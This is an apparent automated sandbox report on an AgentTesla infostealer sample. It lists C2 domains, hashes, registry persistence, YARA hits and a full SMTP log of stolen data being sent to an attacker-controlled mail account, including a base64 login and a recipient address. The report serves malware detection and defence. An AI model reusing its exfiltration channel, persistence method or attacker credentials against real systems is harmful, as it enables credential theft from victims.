http://palumalimited.com | 0% | Avira URL Cloud | safe
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | 0% | Avira URL Cloud | safe
http://DynDns.comDynDNSnamejidpasswordPsi/Psi | 0% | Avira URL Cloud | safe
http://dEIFpD.com | 0% | Avira URL Cloud | safe
http://palumalimited.com | 4% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
palumalimited.com | 174.136.29.110 | true | true | | unknown
mail.palumalimited.com | unknown | unknown | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://mail.palumalimited.com | RegSvcs.exe, 00000002.00000002.4577127670.0000000002F7E000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://127.0.0.1:HTTP/1.1 | RegSvcs.exe, 00000002.00000002.4577127670.0000000002B41000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://wixxOvts0RfcEfM.org | RegSvcs.exe, 00000002.00000002.4577127670.0000000002F76000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://palumalimited.com | RegSvcs.exe, 00000002.00000002.4577127670.0000000002F7E000.00000004.00000800.00020000.00000000.sdmp | false | 4%, Virustotal; Avira URL Cloud: safe | unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | RegSvcs.exe, 00000002.00000002.4577127670.0000000002B41000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://DynDns.comDynDNSnamejidpasswordPsi/Psi | RegSvcs.exe, 00000002.00000002.4577127670.0000000002B41000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://dEIFpD.com | RegSvcs.exe, 00000002.00000002.4577127670.0000000002B41000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
174.136.29.110 | palumalimited.com | United States | 33494 | IHNETUS | true
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1562878
                Start date and time:2024-11-26 08:21:24 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 9m 17s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:9
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:SOA_9828392091.exe
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@7/6@3/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 54
                • Number of non-executed functions: 299
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption
                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                • Report creation exceeded maximum time and may have missing disassembly code information.
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
02:22:19 | API Interceptor | 11187382x Sleep call for process: RegSvcs.exe modified
08:22:22 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run yGbzOMp C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe
08:22:30 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run yGbzOMp C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
174.136.29.110 | luthor.js | malicious | Remcos
• leinadenterprises.com/dig/fiscal.jpg
 | RMT_ADV_110122-PDF.lnk | malicious | Unknown
• leinadenterprises.com/dig/fiscal.jpg
Match | Associated Sample Name / URL | Detection | Threat Name | Context
IHNETUS | botnet.sh4.elf | malicious | Mirai, Moobot
• 216.193.245.90
 | la.bot.arm.elf | malicious | Unknown
• 69.194.228.59
 | na.elf | malicious | Unknown
• 216.193.245.64
 | https://punchconsultingcomdocs.blob.core.windows.net/catherinebrien/2EQ40z6JcQ8ZrKYgbMrrRmtVQafHWHTWzkJLTUq2CjCuzBCekR7uHtqnRYRYmEhiJ2e7Y.html | malicious | Unknown
• 174.136.38.30
 | https://punchconsultingcomdocs.blob.core.windows.net/catherinebrien/2EQ40z6JcQ8ZrKYgbMrrRmtVQafHWHTWzkJLTUq2CjCuzBCekR7uHtqnRYRYmEhiJ2e7Y.html | malicious | Unknown
• 174.136.38.30
 | xd.x86.elf | malicious | Mirai
• 216.193.245.86
 | LisectAVT_2403002C_17.exe | malicious | AgentTesla
• 174.136.29.143
 | 0SpHek7Jd8.elf | malicious | Unknown
• 174.136.30.136
 | Pn0jlaHvxE.elf | malicious | Mirai, Gafgyt, Okiru
• 216.193.235.105
 | rSOAMAR-APR2024-7917089.exe | malicious | AgentTesla, PureLog Stealer
• 174.136.29.110
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe | ngPebbPhbp.exe | malicious | RHADAMANTHYS
 | Pi648je050.exe | malicious | AgentTesla, PureLog Stealer
 | shipping documents.exe | malicious | AgentTesla
 | Termination_List_November_2024_pdf.exe | malicious | AgentTesla
 | Payment_Advice_USD_48,054.40_.exe | malicious | AgentTesla
 | M1Y6kc9FpE.exe | malicious | FormBook
 | mJIvCBk5vF.exe | malicious | FormBook
 | 1aG5DoOsAW.exe | malicious | FormBook
 | copto de pago.exe | malicious | AgentTesla
 | purchase order P857248 dated 04112024.exe | malicious | XWorm
                                    Process:C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:modified
                                    Size (bytes):142
                                    Entropy (8bit):5.090621108356562
                                    Encrypted:false
                                    SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
                                    MD5:8C0458BB9EA02D50565175E38D577E35
                                    SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
                                    SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
                                    SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                    Process:C:\Users\user\Desktop\SOA_9828392091.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):167428
                                    Entropy (8bit):7.878951939288892
                                    Encrypted:false
                                    SSDEEP:3072:fV0VbpAkqg3KPHj1RqiCW/00C9uL9MydkJh5gTi7LpUj:fVbBRqiCWrC9uL9MyahxhUj
                                    MD5:334386F3A59D173402CE42B9E667AD55
                                    SHA1:76D5CAAE31597857864E3E641DFC3CAAEFB891D5
                                    SHA-256:043A82957B45C120FF11CBCA4F75836B25A5FA14BB648BF297BE4FD23B5250BF
                                    SHA-512:14107798765CB6029D4A55EA3E584482CB5118B2E29B7633478714A24CFE9FC82A29D3331B528754D67233FE94B8679993767FB46DCF79D3AF8B746883F7E837
                                    Malicious:false
                                    Reputation:low
                                    Preview:EA06..h..@..je&.P..f...R..&.i.".6..).jx..Y..)4.mJf.1....y ...W..N?...[.M.`.......N....J....d........s...Z.C`..z.S.....L.#0.....S.Yo..J...}&.Q.N'..LF.R....1Y.S...H....).P.`.Q&.0...@*5....@..6....g2Ju&.........+.....&.kX..........O.P.B? ...34.P@.;?.S(.p...h.).0.`...63g..4.....I.L...<.T.`X. ..".6....M<...R(.h.S*.J........8&......Q.Bi...G......+...:.Pf.~.:....*.....O...<?....f..<.N.JkVJ.>.F...S*u&....9...D.m.T.5.uD.Vf{Jm&.I...zf...\..j..P..$..}6.%..+..}O.6.S..JM....F)..%6.+.M.S...;.Sh..l..Y.....>......y.N.]..z..VmV.S.TNl.7D....~..j.....mN...U...{l..(.h.....Pi.(.V.H.k&Q..zgH..95....B.U.<y...d..z..%..+.M..k`.F..... ....Tj:.PO@*?y.....V#ri..eb.M...u....W.3J.~.f...r....F.O+....`.S.SJMGcL.Lc.[on.l..Tz..Q..)4j}..D...l....T....&.G.H .Z5..@.V).z...k..{.E..J.M&..5&.<........@..*....96.N,v.`...`........CS..)U.n.L..H..Y..W.TivJ8.F........Z}:..PN.. ...3.0,.ix.._.`+....b..S9.......@B3..U......y....=@.......zSX.S,...*.2.E....i7..t.u....V)4...An..oQ0-..>.E@.(O.!....c
                                    Process:C:\Users\user\Desktop\SOA_9828392091.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):223232
                                    Entropy (8bit):7.079772904916712
                                    Encrypted:false
                                    SSDEEP:6144:Hdmv5tLvaXAkmQUmMXP0dLQozTwRa281Q0KG2PTpVZZFp:HQfGAUUGdcsTgDFrL
                                    MD5:8153E3C9EF43698B1653DB36BA9A8EC3
                                    SHA1:EAABE0443F156DA7ECF58C18AE97FF1C9AB6AD4C
                                    SHA-256:C23D73DE7CE2D60890D032E1BEADE55EDED9D11FA0A45552A60FABCCF5EA08C8
                                    SHA-512:1392155FFF9B6BE2E4F9A7B56C4E909DCBA09ABC70146E7BCEFF3350FB47BC58F50936AAA4613101F6033AAEE269133D0C42D2D82634DFE7963C8CA0D8120BE8
                                    Malicious:false
                                    Reputation:low
                                    Preview:z..FLILP]94N..MR.47F8HD6wXLFOILPY94NIOMR347F8HD67XLFOILPY94N.OMR=+.H8.M...M..h.80J.>; * RY.%Y&*YCx.#o;9>yPZn...r^[S#.EI<.XLFOILP.|4N.NNR..G%8HD67XLF.INQR8?NI.NR3<7F8HD6Y$OFOiLPY94NIO.R3.7F8JD63XLFOILP]94NIOMR3.4F8JD67XLFMI..Y9$NI_MR34'F8XD67XLF_ILPY94NIOMR+H4FkHD67.OF.LLPY94NIOMR347F8HD67.OFCILPY94NIOMR347F8HD67XLFOILPY94NIOMR347F8HD67XLFOILPY.4NAOMR347F8HD6?xLF.ILPY94NIOMR.@R>LHD6C.OFOiLPYg7NIMMR347F8HD67XLFoIL0wKG<*OMRc17F8.G67^LFO)OPY94NIOMR347FxHDv.*)* *LPU94NI.NR367F8.G67XLFOILPY94N.OM.347F8HD67XLFOILP.E7NIOMR{47F:HA6..NF..LPZ94NXOMT347F8HD67XLFOILPY94NIOMR347F8HD67XLFOILPY94NIOMR-6.G8HN.)ZdBOIFz.J2NIE.S3435?HD<.ZLFK:DPY3.MIOI!:47L.LD63rLF\yNPu94NHOMC%?.]8OS.6tN^DIKF.8.L^DMU+.6j:cF..&MFOM#ZY9>dZ.OR.47F:HD'!Sg]ON[.X.6VBOJD.5.D/CD1/.MjMbN{.G6NIK"Y34=l+xF6.XLFLILAO2.UIHZ.2.5^3HC .Y`DXBLWA.5bKdOy.J4F8L+:7XFl\yNPu94NMOMC%?.]8OS.6tN^DIKF.8.L^DMU+.6j:cF..&HFOM#]Y9>dZ.OR.47F=HD'!Sg]ON[.X.6VBOJD.5.D/CD1/.MjMbN{.;7fXOMX.&7F2bD6$hNFgILP_94__DfI33 .9dF.<XKP.H`RN24IQ.L~1.5m.Jl%7XFl\yNPu94NNOMC
                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:modified
                                    Size (bytes):45984
                                    Entropy (8bit):6.16795797263964
                                    Encrypted:false
                                    SSDEEP:768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
                                    MD5:9D352BC46709F0CB5EC974633A0C3C94
                                    SHA1:1969771B2F022F9A86D77AC4D4D239BECDF08D07
                                    SHA-256:2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
                                    SHA-512:13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Joe Sandbox View:
• Filename: ngPebbPhbp.exe, Detection: malicious
• Filename: Pi648je050.exe, Detection: malicious
• Filename: shipping documents.exe, Detection: malicious
• Filename: Termination_List_November_2024_pdf.exe, Detection: malicious
• Filename: Payment_Advice_USD_48,054.40_.exe, Detection: malicious
• Filename: M1Y6kc9FpE.exe, Detection: malicious
• Filename: mJIvCBk5vF.exe, Detection: malicious
• Filename: 1aG5DoOsAW.exe, Detection: malicious
• Filename: copto de pago.exe, Detection: malicious
• Filename: purchase order P857248 dated 04112024.exe, Detection: malicious
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..d..........V.... ........@.. ..............................s.....`.....................................O.......8............r...A.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...
                                    Process:C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1141
                                    Entropy (8bit):4.442398121585593
                                    Encrypted:false
                                    SSDEEP:24:zKLXkhDObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0hDQntKKH1MqJC
                                    MD5:6FB4D27A716A8851BC0505666E7C7A10
                                    SHA1:AD2A232C6E709223532C4D1AB892303273D8C814
                                    SHA-256:1DC36F296CE49BDF1D560B527DB06E1E9791C10263459A67EACE706C6DDCDEAE
                                    SHA-512:3192095C68C6B7AD94212B7BCA0563F2058BCE00C0C439B90F0E96EA2F029A37C2F2B69487591B494C1BA54697FE891E214582E392127CB8C90AB682E0D81ADB
                                    Malicious:false
                                    Preview:Microsoft (R) .NET Framework Services Installation Utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                    Entropy (8bit):7.801650215912521
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.39%
                                    • UPX compressed Win32 Executable (30571/9) 0.30%
                                    • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    File name:SOA_9828392091.exe
                                    File size:664'064 bytes
                                    MD5:180595851681bf165b09671519906dd1
                                    SHA1:2ddf0c1fd34ce5d9de9de60c39ce4b0b4ba7cac8
                                    SHA256:cc1e3f414454270d801d9dc8251ad2fc700476fdcce48da792fd48ff391f22e7
                                    SHA512:1d53d0b1c917289b82d952d1b41e01cb2b3f9738f2d2d66d6866e1beae97bb56ad05512e64563c1e8ce1275a9c3fbaf4f50eb26e7b967e0a71f0836fa92f1add
                                    SSDEEP:12288:ROv5jKhsfoPA+yeVKUCUxP4C902bdRtJJPikikEAmDuzLEPvI3j/ZBFyLhEJI83k:Rq5TfcdHj4fmbTjZkabZ+aJRk
                                    TLSH:2FE412E1B51ECD99FC4557B1087A9A60015B9F4D4C98920D30EE3F27B6B331328E6E6E
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                    Icon Hash:0fd88dc89ea7861b
                                    Entrypoint:0x525f70
                                    Entrypoint Section:UPX1
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x6745051B [Mon Nov 25 23:15:39 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:ef471c0edf1877cd5a881a6a8bf647b9
                                    Instruction
                                    pushad
                                    mov esi, 004D2000h
                                    lea edi, dword ptr [esi-000D1000h]
                                    push edi
                                    Programming Language:
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    • [ASM] VS2012 UPD4 build 61030
                                    • [RES] VS2012 UPD4 build 61030
                                    • [LNK] VS2012 UPD4 build 61030
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x1747b8         0x424         .rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x127000         0x4d7b8       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x174bdc         0x18          .rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x126154         0x48          UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name   Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy             Characteristics
UPX0   0x1000           0xd1000       0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                   empty      0.0                 IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1   0xd2000          0x55000       0x54200   42610f9da24d545c5078f1951434ef01  False     0.9887368824294205  data       7.937168504837139   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc  0x127000         0x4e000       0x4dc00   c458294e5188d33f4162cefb19129c52  False     0.8154673683681672  data       7.5255971838055675  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name           RVA       Size     Type                                                                                                  Language  Country        ZLIB Complexity
RT_ICON        0x127354  0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 192                                        English   Great Britain  0.3885135135135135
RT_ICON        0x127480  0x10828  Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 60472 x 60472 px/m    English   Great Britain  0.14468236129184905
RT_STRING      0xd4ca0   0x594    OpenPGP Public Key                                                                                    English   Great Britain  1.007703081232493
RT_STRING      0xd5234   0x68a    data                                                                                                  English   Great Britain  1.0065710872162486
RT_STRING      0xd58c0   0x490    data                                                                                                  English   Great Britain  1.009417808219178
RT_STRING      0xd5d50   0x5fc    data                                                                                                  English   Great Britain  1.0071801566579635
RT_STRING      0xd634c   0x65c    OpenPGP Public Key                                                                                    English   Great Britain  1.0067567567567568
RT_STRING      0xd69a8   0x466    data                                                                                                  English   Great Britain  1.0097690941385435
RT_STRING      0xd6e10   0x158    data                                                                                                  English   Great Britain  1.0319767441860466
RT_RCDATA      0x137cac  0x3c647  data                                                                                                                           1.0003476615716729
RT_GROUP_ICON  0x1742f8  0x14     data                                                                                                  English   Great Britain  1.25
RT_GROUP_ICON  0x174310  0x14     data                                                                                                  English   Great Britain  1.15
RT_VERSION     0x174328  0xdc     data                                                                                                  English   Great Britain  0.6181818181818182
RT_MANIFEST    0x174408  0x3b0    ASCII text, with CRLF line terminators                                                                English   Great Britain  0.5116525423728814
DLL           Import
KERNEL32.DLL  LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.dll  AddAce
COMCTL32.dll  ImageList_Remove
COMDLG32.dll  GetSaveFileNameW
GDI32.dll     LineTo
IPHLPAPI.DLL  IcmpSendEcho
MPR.dll       WNetUseConnectionW
ole32.dll     CoGetObject
OLEAUT32.dll  VariantInit
PSAPI.DLL     GetProcessMemoryInfo
SHELL32.dll   DragFinish
USER32.dll    GetDC
USERENV.dll   LoadUserProfileW
UxTheme.dll   IsThemeActive
VERSION.dll   VerQueryValueW
WININET.dll   FtpOpenFileW
WINMM.dll     timeGetTime
WSOCK32.dll   socket
Language of compilation system  Country where language is spoken  Map
English                         Great Britain
Timestamp                         SID      Signature                                       Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
2024-11-26T08:22:11.519362+0100   2030171  ET MALWARE AgentTesla Exfil Via SMTP            1         192.168.2.6  49699        174.136.29.110  587        TCP
2024-11-26T08:22:11.519362+0100   2839723  ETPRO MALWARE Win32/Agent Tesla SMTP Activity   1         192.168.2.6  49699        174.136.29.110  587        TCP
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                    Type            Class        DNS over HTTPS
Nov 26, 2024 08:22:19.580657959 CET  192.168.2.6  1.1.1.1  0xe7fb    Standard query (0)  mail.palumalimited.com  A (IP address)  IN (0x0001)  false
Nov 26, 2024 08:22:20.581919909 CET  192.168.2.6  1.1.1.1  0xe7fb    Standard query (0)  mail.palumalimited.com  A (IP address)  IN (0x0001)  false
Nov 26, 2024 08:22:21.597753048 CET  192.168.2.6  1.1.1.1  0xe7fb    Standard query (0)  mail.palumalimited.com  A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                    CName              Address         Type                    Class        DNS over HTTPS
Nov 26, 2024 08:22:21.661988020 CET  1.1.1.1    192.168.2.6  0xe7fb    No error (0)  mail.palumalimited.com  palumalimited.com                  CNAME (Canonical name)  IN (0x0001)  false
Nov 26, 2024 08:22:21.661988020 CET  1.1.1.1    192.168.2.6  0xe7fb    No error (0)  palumalimited.com                          174.136.29.110  A (IP address)          IN (0x0001)  false
Nov 26, 2024 08:22:21.662036896 CET  1.1.1.1    192.168.2.6  0xe7fb    No error (0)  mail.palumalimited.com  palumalimited.com                  CNAME (Canonical name)  IN (0x0001)  false
Nov 26, 2024 08:22:21.662036896 CET  1.1.1.1    192.168.2.6  0xe7fb    No error (0)  palumalimited.com                          174.136.29.110  A (IP address)          IN (0x0001)  false
Nov 26, 2024 08:22:21.744158983 CET  1.1.1.1    192.168.2.6  0xe7fb    No error (0)  mail.palumalimited.com  palumalimited.com                  CNAME (Canonical name)  IN (0x0001)  false
Nov 26, 2024 08:22:21.744158983 CET  1.1.1.1    192.168.2.6  0xe7fb    No error (0)  palumalimited.com                          174.136.29.110  A (IP address)          IN (0x0001)  false
Timestamp                            Source Port  Dest Port  Source IP       Dest IP         Commands
Nov 26, 2024 08:22:23.142518997 CET  587          49699      174.136.29.110  192.168.2.6     220-fastest.vivawebhost.com ESMTP Exim 4.98 #2 Tue, 26 Nov 2024 02:22:22 -0500
                                                                                             220-We do not authorize the use of this system to transport unsolicited,
                                                                                             220 and/or bulk e-mail.
Nov 26, 2024 08:22:23.142788887 CET  49699        587        192.168.2.6     174.136.29.110  EHLO 138727
Nov 26, 2024 08:22:23.514730930 CET  587          49699      174.136.29.110  192.168.2.6     250-fastest.vivawebhost.com Hello 138727 [8.46.123.75]
                                                                                             250-SIZE 52428800
                                                                                             250-LIMITS MAILMAX=1000 RCPTMAX=50000
                                                                                             250-8BITMIME
                                                                                             250-PIPELINING
                                                                                             250-PIPECONNECT
                                                                                             250-AUTH PLAIN LOGIN
                                                                                             250-STARTTLS
                                                                                             250 HELP
Nov 26, 2024 08:22:23.515893936 CET  49699        587        192.168.2.6     174.136.29.110  AUTH login bm92bG92ZUBwYWx1bWFsaW1pdGVkLmNvbQ==
Nov 26, 2024 08:22:23.887940884 CET  587          49699      174.136.29.110  192.168.2.6     334 UGFzc3dvcmQ6
Nov 26, 2024 08:22:24.272140980 CET  587          49699      174.136.29.110  192.168.2.6     235 Authentication succeeded
Nov 26, 2024 08:22:24.273101091 CET  49699        587        192.168.2.6     174.136.29.110  MAIL FROM:<novlove@palumalimited.com>
Nov 26, 2024 08:22:24.645201921 CET  587          49699      174.136.29.110  192.168.2.6     250 OK
Nov 26, 2024 08:22:24.645569086 CET  49699        587        192.168.2.6     174.136.29.110  RCPT TO:<mullarred@gmail.com>
Nov 26, 2024 08:22:25.065134048 CET  587          49699      174.136.29.110  192.168.2.6     250 Accepted
Nov 26, 2024 08:22:25.065340042 CET  49699        587        192.168.2.6     174.136.29.110  DATA
Nov 26, 2024 08:22:25.437561035 CET  587          49699      174.136.29.110  192.168.2.6     354 Enter message, ending with "." on a line by itself
Nov 26, 2024 08:22:25.438421011 CET  49699        587        192.168.2.6     174.136.29.110  .
Nov 26, 2024 08:22:25.897077084 CET  587          49699      174.136.29.110  192.168.2.6     250 OK id=1tFptv-00000009Zho-0IEv
Nov 26, 2024 08:23:59.597712040 CET  49699        587        192.168.2.6     174.136.29.110  QUIT
Nov 26, 2024 08:24:00.172076941 CET  587          49699      174.136.29.110  192.168.2.6     221 fastest.vivawebhost.com closing connection


                                    Target ID:0
                                    Start time:02:22:13
                                    Start date:26/11/2024
                                    Path:C:\Users\user\Desktop\SOA_9828392091.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\SOA_9828392091.exe"
                                    Imagebase:0x930000
                                    File size:664'064 bytes
                                    MD5 hash:180595851681BF165B09671519906DD1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.2125412515.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2125412515.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.2125412515.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: 00000000.00000002.2125412515.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                    Reputation:low
                                    Has exited:true

                                    Target ID:2
                                    Start time:02:22:14
                                    Start date:26/11/2024
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\SOA_9828392091.exe"
                                    Imagebase:0x7e0000
                                    File size:45'984 bytes
                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000002.4576001997.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4576001997.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000002.00000002.4576001997.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4577127670.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:false

                                    Target ID:4
